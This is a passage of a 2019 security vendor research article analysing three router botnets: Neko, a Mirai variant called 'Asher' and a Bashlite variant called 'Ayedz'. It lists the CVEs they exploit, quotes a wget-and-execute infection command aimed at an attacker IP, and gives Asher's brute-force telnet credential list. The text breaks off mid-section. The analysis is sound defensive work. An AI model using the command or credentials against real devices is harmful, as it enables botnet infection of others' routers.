1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Business For Home Malware Neko, Mirai and Bashlite Target Routers, Devices Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks. By: Augusto Remillano II, Jakub Urbanec August 13, 2019 Read time: 6 min (1826 words) Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks. Neko On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands: https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 1/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices “cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko” Our research indicates that this botnet has versions for various processor architectures. Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch user datagram protocol or UDP and UPD-HEX ood attacks, inundating a router’s ability to properly process and respond to information. It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate. Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices: https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 2/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Eir WAN side remote command injection (TR-064) – a wide area network (WAN) side RCE for Eir D1000 routers HNAP SOAPAction-Header Command Execution (CVE-2015-2051) – RCE for multiple D-Link routers caused by an error in handling malicious HTTP requests Huawei Router HG532 - Arbitrary Command Execution (CVE-2017-17215) – RCE for the Huawei HG532 router caused by the improper validation of a conguration le GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018- 10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection. Linksys E-series - Remote Code Execution – RCE caused by an unauthenticated OS command injection MVPower Shell Command Execution – exploits an unauthenticated RCE vulnerability in MVPower digital video recorders (DVRs) ThinkPHP 5.0.23/5.1.31 RCE – RCE for open-source web development framework ThinkPHP 5.0.23/5.1.31 Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use Realtek SDK with the miniigd daemon Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specic exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices. https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 3/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Figure 1. Neko botnet code showing how it scans for Africo devices On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the le is now UPX- packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked. Figure 2. UPX-packed Neko botnet code with an altered magic number We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure as the Africo scan. https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 4/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200 The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (2016-6277). Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV- DVR exploits and Netgear R7000 and R6400 routers https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 5/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE. Figure 6. Neko botnet code showing how it scans for “awsec” In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”. however, based on our analysis, both commands are unable to successfully exploit any vulnerability. “Cisco” appears to be attempting to use CVE-2018- 15379, wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permission, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited. Figure 7. Neko botnet code showing how it scans for “cisco” https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 6/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail. Figure 8. Neko botnet code showing how it scans for “wap54g” Mirai variant “Asher” On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices with a BusyBox, which is a software suite for devices with limited resources. It rst checks for BusyBox presence by executing the "/bin/busybox {any string}" command. If the device’s system responds with " {any string} applet not found," the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.” https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 7/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Figure 9. Screenshot showing the command that checks for the presence of a BusyBox The “Asher” variant can inltrate routers by brute-forcing its way in using the following telnet login credentials: 12345 2011vsta 2601hx 4321 admin daemon default guest OxhlwSG8 pass password root S2fGqNFs support D13hh[ synnet t0talc0ntr0l4! taZz@23495859 tlJwpbo6 vizxv xc3511 We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko: https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 8/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Figure 10. The exploits Asher botnet scans for GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018- 10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection. MVPower Shell Command Execution – an unauthenticated RCE in MVPower DVR TV-7104HE 1.8.4 115215B9 digital video recorders Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use Realtek SDK with the miniigd daemon Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361 https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 9/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562 Bashlite variant “Ayedz” On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time, a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s le name. Upon